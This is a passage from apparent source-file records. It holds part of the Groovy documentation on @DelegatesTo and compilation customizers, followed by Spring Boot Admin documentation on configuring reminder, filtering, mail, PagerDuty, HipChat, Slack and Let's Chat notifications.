potential\nreceivers of method calls in the closure body.\n\nThe idea is to annotate the\u00a0`Closure` parameter of the\u00a0`email` method:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto,indent=0]\n---------------------------------------\n\nWhat we\u2019ve done here is telling the compiler (or the IDE) that when the\nmethod will be called with a closure, the delegate of this closure will\nbe set to an object of type\u00a0`email`. But there is still a problem: the\ndefaut delegation strategy is not the one which is used in our method.\nSo we will give more information and tell the compiler (or the IDE) that\nthe delegation strategy is also changed:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=email_method_delegatesto_strategy,indent=0]\n---------------------------------------\n\nNow, both the IDE and the type checker (if you are using `@TypeChecked`)\nwill be aware of the delegate and the delegation strategy. This is very\nnice because it will both allow the IDE to provide smart completion, but\nit will also remove errors at compile time that exist only because the\nbehaviour of the program is normally only known at runtime!\n\nThe following code will now pass compilation:\n\n[source,groovy]\n---------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=sendmail_typechecked_pass,indent=0]\n---------------------------------------\n\n[[TheDelegatesToannotation-DelegatesTomodes]]\n=== DelegatesTo modes\n\n`@DelegatesTo` supports multiple modes that we will describe with examples\nin this section.\n\n[[TheDelegatesToannotation-Simpledelegation]]\n==== Simple delegation\n\nIn this mode, the only mandatory parameter is the\u00a0_value_ which says to\nwhich class we delegate calls. Nothing more. We\u2019re telling the compiler\nthat the type of the delegate will\u00a0*always* be of the type documented\nby\u00a0`@DelegatesTo` (note that it can be a subclass, but if it is, the\nmethods defined by the subclass will not be visible to the type\nchecker).\n\n[source,groovy]\n-----------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=simple_delegation,indent=0]\n-----------------------------------------------\n\n[[TheDelegatesToannotation-Delegationstrategy]]\n==== Delegation strategy\n\nIn this mode, you must specify both the delegate class\u00a0*and* a\ndelegation strategy. This must be used if the closure will not be called\nwith the default delegation strategy, which is\u00a0`Closure.OWNER_FIRST`.\n\n[source,groovy]\n----------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegation_with_strategy,indent=0]\n----------------------------------------------------------------------------------\n\n[[TheDelegatesToannotation-Delegatetoparameter]]\n==== Delegate to parameter\n\nIn this variant, we will tell the compiler that we are delegating to\nanother parameter of the method. Take the following code:\n\n[source,groovy]\n-------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_no_delegatesto,indent=0]\n-------------------------------------------------\n\nHere, the delegate which will be used is\u00a0*not* created inside the\u00a0`exec`\nmethod. In fact, we take an argument of the method and delegate to it.\nUsage may look like this:\n\n[source,groovy]\n-----------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_usage,indent=0]\n-----------------------\n\nEach of the method calls are delegated to the\u00a0`email` parameter. This is\na widely used pattern which is also supported by\u00a0`@DelegatesTo` using a\ncompanion annotation:\n\n[source,groovy]\n---------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=exec_method_with_delegatesto,indent=0]\n---------------------------------------------------------------\n\nA closure is annotated with\u00a0`@DelegatesTo`, but this time, without\nspecifying any class. Instead, we\u2019re annotating another parameter\nwith\u00a0`@DelegatesTo.Target`. The type of the delegate is then determined\nat compile time. One could think that we are using the parameter type,\nwhich in this case is\u00a0`Object` but this is not true. Take this code:\n\n[source,groovy]\n--------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_header,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=delegatesto_flow_typing_footer,indent=0]\n--------------------------------------\n\nRemember that this works out of the box\u00a0*without* having to annotate\nwith\u00a0`@DelegatesTo`. However, to make the IDE aware of the delegate\ntype, or the\u00a0*type checker* aware of it, we need to add\u00a0`@DelegatesTo`.\nAnd in this case, it will now that the\u00a0`Greeter` variable is of\ntype\u00a0`Greeter`, so it will not report errors on the\u00a0_sayHello_\nmethod\u00a0*even if the exec method doesn\u2019t explicitely define the target as\nof type Greeter*. This is a very powerful feature, because it prevents\nyou from writing multiple versions of the same\u00a0`exec` method for\ndifferent receiver types!\n\nIn this mode, the\u00a0`@DelegatesTo` annotation also supports the\u00a0`strategy`\nparameter that we\u2019ve described upper.\n\n[[TheDelegatesToannotation-Multipleclosures]]\n==== Multiple closures\n\nIn the previous example, the\u00a0`exec` method accepted only one closure,\nbut you may have methods that take multiple closures:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_no_delegatesto,indent=0]\n--------------------------------------------------------------------\n\nThen nothing prevents you from annotating each closure\nwith\u00a0`@DelegatesTo`:\n\n[source,groovy]\n--------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_classes,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_header,indent=0]\n ...\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_method_footer,indent=0]\n--------------------------------------------------------------------\n\nBut more importantly, if you have multiple closures\u00a0*and* multiple\narguments, you can use several targets:\n\n[source,groovy]\n-----------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=foobarbaz_multitarget,indent=0]\n\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=multitarget_test,indent=0]\n-----------------------------------------------------------------------------\n\nNOTE: At this point, you may wonder why we don\u2019t use the parameter names as\nreferences. The reason is that the information (the parameter name) is\nnot always available (it\u2019s a debug-only information), so it\u2019s a\nlimitation of the JVM.\n\n==== Delegating to a generic type\n\nIn some situations, it is interesting to instruct the IDE or the compiler that the delegate type will not be a parameter\nbut a generic type. Imagine a configurator that runs on a list of elements:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_method,indent=0]\n----\n\nThen this method can be called with any list like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_usage,indent=0]\n----\n\nTo let the type checker and the IDE know that the `configure` method calls the closure on each element of the list, you\n need to use `@DelegatesTo` differently:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/DelegatesToSpecTest.groovy[tags=configure_list_with_delegatesto,indent=0]\n----\n\n`@DelegatesTo` takes an optional `genericTypeIndex` argument that tells what is the index of the generic type that will\nbe used as the delegate type. This *must* be used in conjunction with `@DelegatesTo.Target` and the index starts at 0. In\nthe example above, that means that the delegate type is resolved against `List<T>`, and since the generic type at index\n0 is `T` and inferred as a `Realm`, the type checker infers that the delegate type will be of type `Realm`.\n\nNOTE: We're using a `genericTypeIndex` instead of a placeholder (`T`) because of JVM limitations.\n\n[[compilation-customizers]]\n== Compilation customizers\n=== Introduction\n\nWhether you are using\u00a0`groovyc` to compile classes or a\u00a0`GroovyShell`,\nfor example, to execute scripts, under the hood, a _compiler configuration_ is used. This configuration holds information\nlike the source encoding or the classpath but it can also be used to perform more operations like adding imports by\ndefault, applying AST transformations transparently or disabling global AST transformations.\n\nThe goal of compilation customizers is to make those common tasks easy to implement. For that, the\u00a0`CompilerConfiguration`\nclass is the entry point. The general schema will always be based on the following code:\n\n[source,groovy]\n--------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\n\/\/ create a configuration\ndef config = new CompilerConfiguration()\n\/\/ tweak the configuration\nconfig.addCompilationCustomizers(...)\n\/\/ run your script\ndef shell = new GroovyShell(config)\nshell.evaluate(script)\n--------------------------------------------------------\n\nCompilation customizers must extend the\u00a0_org.codehaus.groovy.control.customizers.CompilationCustomizer_ class. A customizer works:\n\n* on a specific compilation phase\n* on\u00a0_every_ class node being compiled\n\nYou can implement your own compilation customizer but Groovy includes some of the most common operations.\n\n=== Import customizer\n\nUsing this compilation customizer, your code will have imports added\ntransparently. This is in particular useful for scripts implementing a\nDSL where you want to avoid users from having to write imports. The\nimport customizer will let you add all the variants of imports the\nGroovy language allows, that is:\n\n* class imports, optionally aliased\n* star imports\n* static imports, optionally aliased\n* static star imports\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=import_cz,indent=0]\n-----------------------------------------------------------------------------------------------------\n\nA detailed description of all shortcuts can be found in gapi::org.codehaus.groovy.control.customizers.ImportCustomizer\n\n=== AST transformation customizer\n\nThe AST transformation customizer is meant to apply AST transformations\ntransparently. Unlike global AST transformations that apply on every\nclass beeing compiled as long as the transform is found on classpath\n(which has drawbacks like increasing the compilation time or side\neffects due to transformations applied where they should not), the\ncustomizer will allow you to selectively apply a transform only for\nspecific scripts or classes.\n\nAs an example, let\u2019s say you want to be able to use\u00a0`@Log` in a script.\nThe problem is that\u00a0`@Log` is normally applied on a class node and a\nscript, by definition, doesn\u2019t require one. But implementation wise,\nscripts are classes, it\u2019s just that you cannot annotate this implicit\nclass node with\u00a0`@Log`. Using the AST customizer, you have a workaround\nto do it:\n\n[source,groovy]\n--------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\nimport groovy.util.logging.Log\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_simple,indent=0]\n--------------------------------------------------------------------------\n\nThat\u2019s all! Internally, the\u00a0`@Log` AST transformation is applied to\nevery class node in the compilation unit. This means that it will be\napplied to the script, but also to classes defined within the script.\n\nIf the AST transformation that you are using accepts parameters, you can\nuse parameters in the constructor too:\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_customname,indent=0]\n-----------------------------------------------------------------------------------------------------------------\n\nAs the AST transformation customizers works with objects instead of AST\nnodes, not all values can be converted to AST transformation parameters.\nFor example, primitive types are converted to\u00a0`ConstantExpression` (that\nis `LOGGER` is converted to\u00a0`new ConstantExpression('LOGGER')`, but if\nyour AST transformation takes a closure as an argument, then you have to\ngive it a\u00a0`ClosureExpression`, like in the following example:\n\n[source,groovy]\n--------------------------------------------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=ast_cz_closure,indent=0]\n--------------------------------------------------------------------------------------------------------------\n\nFor a complete list of options, please refer to gapi::org.codehaus.groovy.control.customizers.ASTTransformationCustomizer\n\n=== Secure AST customizer\n\nThis customizer will allow the developer of a DSL to restrict the\n*grammar* of the language, to prevent users from using some constructs,\nfor example. It is only ``secure'' in that sense only and it is very\nimportant to understand that it does\u00a0*not* replace a security manager.\nThe only reason for it to exist is to limit the expressiveness of the\nlanguage. This customizer only works at the AST (abstract syntax tree)\nlevel, not at runtime! It can be strange at first glance, but it makes\nmuch more sense if you think of Groovy as a platform to build DSLs. You\nmay not want a user to have a complete language at hand. In the example\nbelow, we will demonstrate it using an example of language that only\nallows arithmetic operations, but this customizer allows you to:\n\n* allow\/disallow creation of closures\n* allow\/disallow imports\n* allow\/disallow package definition\n* allow\/disallow definition of methods\n* restrict the receivers of method calls\n* restrict the kind of AST expressions a user can use\n* restrict the tokens (grammar-wise) a user can use\n* restrict the types of the constants that can be used in code\n\nFor all those features, the secure AST customizer works using either a\nwhitelist (list of elements that are allowed)\u00a0*or* a blacklist (list of\nelements that are disallowed). For each type of feature (imports,\ntokens, \u2026) you have the choice to use either a whitelist or a blacklist,\nbut you can mix whitelists and blacklists for distinct features. In\ngeneral, you will choose whitelists (disallow all, allow selected).\n\n[source,groovy]\n-------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SecureASTCustomizer\nimport static org.codehaus.groovy.syntax.Types.* <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz,indent=0]\n-------------------------------------------------------------------------------------\n<1> use for token types from gapi::org.codehaus.groovy.syntax.Types\n<2> you can use class literals here\n\nIf what the secure AST customizer provides out of the box isn\u2019t enough\nfor your needs, before creating your own compilation customizer, you\nmight be interested in the expression and statement checkers that the\nAST customizer supports. Basically, it allows you to add custom checks\non the AST tree, on expressions (expression checkers) or statements\n(statement checkers). For this, you must\nimplement\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker`\nor\u00a0`org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker`.\n\nThose interfaces define a single method called\u00a0`isAuthorized`, returning\na boolean, and taking a\u00a0`Statement` (or\u00a0`Expression`) as a parameter. It\nallows you to perform complex logic over expressions or statements to\ntell if a user is allowed to do it or not.\n\nFor example, there's no predefined configuration flag in the customizer which\nwill let you prevent people from using an attribute expression. Using a custom\nchecker, it is trivial:\n\n[source,groovy]\n----------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom,indent=0]\n----------------------------------------------------------------------\n\nThen we can make sure that this works by evaluating a simple script:\n\n[source,groovy]\n----\nnew GroovyShell(config).evaluate '''\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=secure_cz_custom_assert,indent=4]\n'''\n----\n<1> will fail compilation\n\nStatements can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.StatementChecker\nExpressions can be checked using gapi::org.codehaus.groovy.control.customizers.SecureASTCustomizer.ExpressionChecker\n\n=== Source aware customizer\n\nThis customizer may be used as a filter on other customizers. The\nfilter, in that case, is the\u00a0`org.codehaus.groovy.control.SourceUnit`.\nFor this, the source aware customizer takes another customizer as a\ndelegate, and it will apply customization of that delegate only and only\nif predicates on the source unit match.\n\n`SourceUnit` gives you access to multiple things but in particular the\nfile being compiled (if compiling from a file, of course). It gives\nyou the potential to perform operation based on the file name, for\nexample. Here is how you would create a source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------\nimport org.codehaus.groovy.control.customizers.SourceAwareCustomizer\nimport org.codehaus.groovy.control.customizers.ImportCustomizer\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz,indent=0]\n--------------------------------------------------------------------\n\nThen you can use predicates on the source aware customizer:\n\n[source,groovy]\n--------------------------------------------------------------------------\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=source_cz_predicates,indent=0]\n--------------------------------------------------------------------------\n\n=== Customizer builder\n\nIf you are using compilation customizers in Groovy code (like the\nexamples above) then you can use an alternative syntax to customize compilation.\nA builder\u00a0(`org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder`)\nsimplifies the creation of customizers using a hierarchical DSL.\n\n[source,groovy]\n-----------------------------------------------------------------------------------------------------\nimport org.codehaus.groovy.control.CompilerConfiguration\nimport static org.codehaus.groovy.control.customizers.builder.CompilerCustomizationBuilder.withConfig <1>\n\ninclude::{projectdir}\/src\/spec\/test\/CustomizersTest.groovy[tags=customizer_withconfig,indent=0]\n-----------------------------------------------------------------------------------------------------\n<1> static import of the builder method\n<2> configuration goes here\n\nThe code sample above shows how to use the builder. A static\nmethod,\u00a0_withConfig_, takes a closure corresponding to the builder code,\nand automatically registers compilation customizers to the\nconfiguration. Every compilation customizer available in the distribution\ncan be configured this way:\n\n==== Import customizer\n\n[source,groovy]\n----------------------------------------------------------------------------------\nwithConfig(configuration) {\n imports { \/\/ imports customizer\n normal 'my.package.MyClass' \/\/ a normal import\n alias 'AI', 'java.util.concurrent.atomic.AtomicInteger' \/\/ an aliased import\n star 'java.util.concurrent' \/\/ star imports\n staticMember 'java.lang.Math', 'PI' \/\/ static import\n staticMember 'pi', 'java.lang.Math', 'PI' \/\/ aliased static import\n }\n}\n----------------------------------------------------------------------------------\n\n==== AST transformation customizer\n\n[source,groovy]\n-------------------------------------------\nwithConfig(conf) {\n ast(Log) <1>\n}\n\nwithConfig(conf) {\n ast(Log, value: 'LOGGER') <2>\n}\n-------------------------------------------\n<1> apply @Log transparently\n<2> apply @Log with a different name for the logger\n\n==== Secure AST customizer\n\n[source,groovy]\n--------------------------------------\nwithConfig(conf) {\n secureAst {\n closuresAllowed = false\n methodDefinitionAllowed = false\n }\n}\n--------------------------------------\n\n==== Source aware customizer\n\n[source,groovy]\n--------------------------------------------------------------------------------------\nwithConfig(configuration){\n source(extension: 'sgroovy') {\n ast(CompileStatic) <1>\n }\n}\n\nwithConfig(configuration){\n source(extensions: ['sgroovy','sg']) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(extensionValidator: { it.name in ['sgroovy','sg']}) {\n ast(CompileStatic) <2>\n }\n}\n\nwithConfig(configuration) {\n source(basename: 'foo') {\n ast(CompileStatic) <3>\n }\n}\n\nwithConfig(configuration) {\n source(basenames: ['foo', 'bar']) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(basenameValidator: { it in ['foo', 'bar'] }) {\n ast(CompileStatic) <4>\n }\n}\n\nwithConfig(configuration) {\n source(unitValidator: { unit -> !unit.AST.classes.any { it.name == 'Baz' } }) {\n ast(CompileStatic) <5>\n }\n}\n--------------------------------------------------------------------------------------\n<1> apply CompileStatic AST annotation on .sgroovy files\n<2> apply CompileStatic AST annotation on .sgroovy or .sg files\n<3> apply CompileStatic AST annotation on files whose name is 'foo'\n<4> apply CompileStatic AST annotation on files whose name is 'foo' or 'bar'\n<5> apply CompileStatic AST annotation on files that do not contain a class named 'Baz'\n\n==== Inlining a customizer\n\nInlined customizer allows you to write a compilation customizer\ndirectly, without having to create a class for it.\n\n[source,groovy]\n--------------------------------------------------------------\nwithConfig(configuration) {\n inline(phase:'CONVERSION') { source, context, classNode -> <1>\n println \"visiting $classNode\" <2>\n }\n}\n--------------------------------------------------------------\n<1> define an inlined customizer which will execute at the CONVERSION phase\n<2> prints the name of the class node being compiled\n\n==== Multiple customizers\n\nOf course, the builder allows you to define multiple customizers at\nonce:\n\n[source,groovy]\n---------------------------\nwithConfig(configuration) {\n ast(ToString)\n ast(EqualsAndHashCode)\n}\n---------------------------\n\n=== Config script flag\n\nSo far, we have described how you can customize compilation using\na\u00a0`CompilationConfiguration` class, but this is only possible if you\nembed Groovy and that you create your own instances\nof\u00a0`CompilerConfiguration` (then use it to create a\n`GroovyShell`,\u00a0`GroovyScriptEngine`, \u2026).\n\nIf you want it to be applied on the classes you compile with the normal\nGroovy compiler (that is to say with \u00a0`groovyc`,\u00a0`ant` or\u00a0`gradle`,\nfor example), it is possible to use a compilation flag named\u00a0`configscript`\nthat takes a Groovy configuration script as argument.\n\nThis script gives you access to the\u00a0`CompilerConfiguration` instance\u00a0*before*\nthe files are compiled (exposed into the configuration script as a variable named `configuration`),\nso that you can tweak it.\n\nIt also transparently integrates the compiler configuration builder above. As an example, let's see\nhow you would activate static compilation by default on all classes.\n\n==== Static compilation by default\n\nNormally, classes in Groovy are compiled with a dynamic runtime. You can activate static compilation\nby placing an annotation named `@CompileStatic` on any class. Some people would like to have this\nmode activated by default, that is to say not having to annotated classes. Using `configscript`,\nthis is possible. First of all, you need to create a file named `config.groovy` into `src\/conf` with\nthe following contents:\n\n[source,groovy]\n--------------------------------------\nwithConfig(configuration) { <1>\n ast(groovy.transform.CompileStatic)\n}\n--------------------------------------\n<1> _configuration_ references a `CompilerConfiguration` instance\n\nThat is actually all you need. You don\u2019t have to import the builder, it\u2019s automatically\nexposed in the script. Then, compile your files using the following command line:\n\n---------------------------------------------------------------------------\ngroovyc -configscript src\/conf\/config.groovy src\/main\/groovy\/MyClass.groovy\n---------------------------------------------------------------------------\n\nWe strongly recommand you to separate configuration files from classes,\nhence why we suggest using the `src\/main` and `src\/conf` directories above.\n\n=== AST transformations (TBD)\n== Custom type checking extensions (TBD)\n== Builders (TBD)\n=== Creating a builder (TBD)\n==== BuilderSupport (TBD)\n==== FactoryBuilderSupport (TBD)\n=== Existing builders (TBD)\n==== MarkupBuilder (TBD)\n==== StreamingMarkupBuilder (TBD)\n==== SaxBuilder (TBD)\n==== StaxBuilder (TBD)\n==== DomBuilder (TBD)\n==== NodeBuilder (TBD)\n==== JsonBuilder (TBD)\n==== StreamingJsonBuilder (TBD)\n==== SwingBuilder (TBD)\n==== AntBuilder (TBD)\n==== CliBuilder (TBD)\n==== ObjectGraphBuilder (TBD)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6d2f1ba80a0e45636a464bcb5bda38aaea6d978","subject":"Polish documentation","message":"Polish documentation\n","repos":"joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/server-notifications.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/server-notifications.adoc","new_contents":"=== Notifications ===\n\n[reminder-notifications]\n==== Reminder notifications ====\nThe `RemindingNotifier` sends reminders for down\/offline applications, it delegates the sending of notifications to another notifier.\n\nBy default a reminder is triggered when a registered application changes to `DOWN` or `OFFLINE`. You can alter this behaviour via `setReminderStatuses()`. The reminder ends when either the status changes to a non-triggering status or the regarding application gets deregistered.\n\nBy default the reminders are sent every 10 minutes, to change this use `setReminderPeriod()`. The `RemindingNotifier` itself doesn't start the background thread to send the reminders, you need to take care of this as shown in the given example below;\n\n.How to configure reminders\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n @Autowired\n private Notifier notifier;\n\n @Bean\n @Primary\n public RemindingNotifier remindingNotifier() {\n RemindingNotifier remindingNotifier = new RemindingNotifier(notifier);\n remindingNotifier.setReminderPeriod(TimeUnit.MINUTES.toMillis(5)); \/\/ <1>\n return remindingNotifier;\n }\n\n @Scheduled(fixedRate = 60_000L) \/\/ <2>\n public void remind() {\n remindingNotifier().sendReminders();\n }\n}\n----\n<1> The reminders will be sent every 5 minutes.\n<2> Schedules sending of due reminders every 60 seconds.\n\n[[filtering-notifications]]\n==== Filtering notifications ====\nThe `FilteringNotifier` allows you to filter certain notification based on rules you can add\/remove at runtime. It delegates the sending of notifications to another notifier.\n\nIf you add a `FilteringNotifier` to your `ApplicationContext` a RESTful interface on `api\/notifications\/filter` gets available. When this happens the ui shows options to manage the filters.\n\nThis notifier is useful if you don't want recieve notifications when deploying your applications. Before stopping the application you can add an (expiring) filter either via a `POST` request or the ui.\n\n.How to configure filtering\n[source,java]\n----\n@Configuration\n@EnableScheduling\npublic class NotifierConfiguration {\n\t@Autowired\n\tprivate Notifier delegate;\n\n\t@Bean\n\tpublic FilteringNotifier filteringNotifier() { \/\/ <1>\n\t\treturn new FilteringNotifier(delegate);\n\t}\n\n\t@Bean\n\t@Primary\n\tpublic RemindingNotifier remindingNotifier() { \/\/ <2>\n\t\tRemindingNotifier notifier = new RemindingNotifier(filteringNotifier());\n\t\tnotifier.setReminderPeriod(TimeUnit.SECONDS.toMillis(10));\n\t\treturn notifier;\n\t}\n\n\t@Scheduled(fixedRate = 1_000L)\n\tpublic void remind() {\n\t\tremindingNotifier().sendReminders();\n\t}\n}\n----\n<1> Add the `FilteringNotifier` bean using a delegate (e.g. `MailNotifier` when configured)\n<2> Add the `RemindingNotifier` as primary bean using the `FilteringNotifier` as delegate.\n\nTIP: This examples combines the reminding and filtering notifiers. This allows you to get notifications after the deployed applications hasn't restarted in a certain amount of time (until the filter expires).\n\n[[mail-notifications]]\n==== Mail notifications ====\n\nConfigure a `JavaMailSender` using `spring-boot-starter-mail` and set a recipient.\n\n[source,xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-mail<\/artifactId>\n<\/dependency>\n----\n\n.application.properties\n----\nspring.mail.host=smtp.example.com\nspring.boot.admin.notify.mail.to=admin@example.com\n----\n\n.Mail notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.mail.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.mail.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.mail.to\n| Comma-delimited list of mail recipients\n| `\"root@localhost\"`\n\n| spring.boot.admin.notify.mail.cc\n| Comma-delimited list of carbon-copy recipients\n|\n\n| spring.boot.admin.notify.mail.from\n| Mail sender\n|\n\n| spring.boot.admin.notify.mail.subject\n| Mail subject. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id}) is #{to.status}\"+++`\n\n| spring.boot.admin.notify.mail.text\n| Mail body. SpEL-expressions are supported\n| `+++\"#{application.name} (#{application.id})\\nstatus changed from #{from.status} to #{to.status}\\n\\n#{application.healthUrl}\"+++`\n|===\n\n[[pagerduty-notifications]]\n==== Pagerduty notifications ====\nTo enable pagerduty notifications you just have to add a generic service to your pagerduty-account and set `spring.boot.admin.notify.pagerduty.service-key` to the service-key you received.\n\n.Pagerduty notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.pagerduty.enabled\n| Enable mail notifications\n| `true`\n\n| spring.boot.admin.notify.pagerduty.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.pagerduty.service-key\n| Service-key to use for Pagerduty\n|\n\n| spring.boot.admin.notify.pagerduty.url\n| The Pagerduty-rest-api url\n| `+++\"https:\/\/events.pagerduty.com\/generic\/2010-04-15\/create_event.json\"+++`\n\n| spring.boot.admin.notify.pagerduty.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"#{application.name}\/#{application.id} is #{to.status}\"+++`\n\n| spring.boot.admin.notify.pagerduty.client\n| Client-name to use in the event\n|\n\n| spring.boot.admin.notify.pagerduty.client-url\n| Client-url to use in the event\n|\n|===\n\n[hipchat-notifications]\n==== Hipchat notifications ====\nTo enable Hipchat notifications you need to create an API token from you Hipchat account and set the appropriate configuration properties.\n\n.Hipchat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.hipchat.enabled\n| Enable Hipchat notifications\n| `true`\n\n| spring.boot.admin.notify.hipchat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.hipchat.url\n| The HipChat REST API (V2) URL\n|\n\n| spring.boot.admin.notify.hipchat.auth-token\n| The API token with access to the notification room\n|\n\n| spring.boot.admin.notify.hipchat.room-id\n| The ID or url-encoded name of the room to send notifications to\n|\n\n| spring.boot.admin.notify.hipchat.notify\n| Whether the message should trigger a user notification\n| `false`\n\n| spring.boot.admin.notify.hipchat.description\n| Description to use in the event. SpEL-expressions are supported\n| `+++\"<strong>#{application.name}<\/strong>\/#{application.id} is <strong>#{to.status}<\/strong>\"+++`\n|\n|===\n\n[slack-notifications]\n==== Slack notifications ====\nTo enable Slack notifications you need to add a incoming Webhook under custom integrations on your Slack\naccount and configure it appropriately.\n\n.Slack notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.slack.enabled\n| Enable Slack notifications\n| `true`\n\n| spring.boot.admin.notify.slack.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.slack.webhook-url\n| The Slack Webhook URL to send notifications\n|\n\n| spring.boot.admin.notify.slack.channel\n| Optional channel name (without # at the beginning). If different than channel in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.icon\n| Optional icon name (without surrounding colons). If different than icon in Slack Webhooks settings\n|\n\n| spring.boot.admin.notify.slack.username\n| Optional username to send notification if different than in Slack Webhooks settings\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.slack.message\n| Message to use in the event. SpEL-expressions and Slack markups are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n\n[letschat-notifications]\n==== Let's Chat notifications ====\nTo enable Let's Chat notifications you need to add the host url and add the API token and username from Let's Chat\n\n.Let's Chat notifications configuration options\n|===\n| Property name |Description |Default value\n\n| spring.boot.admin.notify.letschat.enabled\n| Enable let\u00b4s Chat notifications\n| `true`\n\n| spring.boot.admin.notify.letschat.ignore-changes\n| Comma-delimited list of status changes to be ignored. Format: \"<from-status>:<to-status>\". Wildcards allowed.\n| `\"UNKNOWN:UP\"`\n\n| spring.boot.admin.notify.letschat.url\n| The let\u00b4s Chat Host URL to send notifications\n|\n\n| spring.boot.admin.notify.letschat.room\n| the room where to send the messages\n|\n\n| spring.boot.admin.notify.letschat.token\n| the token to access the let\u00b4s Chat API\n|\n\n| spring.boot.admin.notify.letschat.username\n| The username for which the token was created\n| `Spring Boot Admin`\n\n| spring.boot.admin.notify.letschat.message\n| Message to use in the event. SpEL-expressions are supported\n| `+++\"*#{application.name}* (#{application.id}) is *#{to.status}*\"+++`\n|\n|===\n","old_contents":"=== Notifications ===\n\n[reminder-notifications]\n==== Reminder notifications ====\nThe `RemindingNotifier` sends reminders for down\/offline applications, it delegates the sending of notifications to another notifier.\n\nBy default a reminder is triggered when a registered application changes to `DOWN` or 